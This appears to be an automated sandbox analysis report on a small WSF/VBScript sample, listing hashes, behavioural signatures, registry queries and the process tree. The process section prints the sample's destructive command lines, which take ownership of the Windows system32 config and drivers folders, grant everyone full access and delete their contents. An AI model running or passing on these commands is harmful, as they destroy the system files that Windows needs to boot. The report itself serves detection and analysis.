Analysis
-
max time kernel: 139s
max time network: 133s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 15-08-2024 21:31
Static task: static1
Behavioral task: behavioral1
Sample: file.wsf
Resource: win7-20240708-en
General
-
Target: file.wsf
Size: 2KB
MD5: b39eb8682deec9c7a7edcb64512655b0
SHA1: d412384d9cfd8ec2333146eb1dd6c137543dabc7
SHA256: 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
SHA512: 539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625
Malware Config
Signatures
-
Possible privilege escalation attempt (4 IoCs)
Processes:
  pid   process
  4260  takeown.exe
  3976  takeown.exe
  2168  icacls.exe
  4840  icacls.exe
-
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence check.
Processes:
  description         ioc                                                                                              process
  Key value queried   \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation   cmd.exe
  Key value queried   \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation   WScript.exe
-
Modifies file permissions (1 TTP, 4 IoCs)
Processes:
  pid   process
  2168  icacls.exe
  4840  icacls.exe
  4260  takeown.exe
  3976  takeown.exe
-
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class (1 IoC)
Processes:
  description   ioc                                                                                  process
  Key created   \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings   cmd.exe
-
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description                      pid   process
  Token: SeTakeOwnershipPrivilege  3976  takeown.exe
-
Suspicious use of WriteProcessMemory (14 IoCs)
Processes:
  description                        pid   process      target process
  PID 2284 wrote to memory of 440    2284  cmd.exe      WScript.exe
  PID 2284 wrote to memory of 440    2284  cmd.exe      WScript.exe
  PID 440 wrote to memory of 1204    440   WScript.exe  cmd.exe
  PID 440 wrote to memory of 1204    440   WScript.exe  cmd.exe
  PID 440 wrote to memory of 1448    440   WScript.exe  cmd.exe
  PID 440 wrote to memory of 1448    440   WScript.exe  cmd.exe
  PID 1448 wrote to memory of 3976   1448  cmd.exe      takeown.exe
  PID 1448 wrote to memory of 3976   1448  cmd.exe      takeown.exe
  PID 1204 wrote to memory of 4260   1204  cmd.exe      takeown.exe
  PID 1204 wrote to memory of 4260   1204  cmd.exe      takeown.exe
  PID 1204 wrote to memory of 2168   1204  cmd.exe      icacls.exe
  PID 1204 wrote to memory of 2168   1204  cmd.exe      icacls.exe
  PID 1448 wrote to memory of 4840   1448  cmd.exe      icacls.exe
  PID 1448 wrote to memory of 4840   1448  cmd.exe      icacls.exe
Processes
-
C:\Windows\system32\cmd.exe (PID 2284, depth 1)
  Command line: cmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WScript.exe (PID 440, depth 2)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\cmd.exe (PID 1204, depth 3)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\takeown.exe (PID 4260, depth 4)
        Command line: takeown /f c:\windows\system32\config\*
        - Possible privilege escalation attempt
        - Modifies file permissions

      C:\Windows\system32\icacls.exe (PID 2168, depth 4)
        Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions

    C:\Windows\System32\cmd.exe (PID 1448, depth 3)
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\takeown.exe (PID 3976, depth 4)
        Command line: takeown /f c:\windows\system32\drivers\*
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken

      C:\Windows\system32\icacls.exe (PID 4840, depth 4)
        Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 2KB (the submitted sample)
MD5: b39eb8682deec9c7a7edcb64512655b0
SHA1: d412384d9cfd8ec2333146eb1dd6c137543dabc7
SHA256: 9f64109481421d805229faf288c8d0a2cb648aade6acccd0b0cf4aba1f26df27
SHA512: 539eaf53ac7f79416519742ba365d0e5d4c8ebc78ba59d8cf5b6f677e7f35fe99d42c3802245d7c5a68e7377d9b88a528fa495fc5b45a01f467fa5705a4af625
-
Filesize: 98B
MD5: 4b91264568ac2162700be36338c095e8
SHA1: c95726edf8303e6adabcb12ffdca90b51349990a
SHA256: 2c8545e54e8fbc28791314d7327886237c66b70640d069f276a35b6c3322c037
SHA512: e57319453e5da3407ccc77cb3ee6200592e1916932cae467bbf77722f3ff49e5853b4b4d2eeb3092dbb2e22346f56617cc785744771bb3648bf4561feb0e9e1b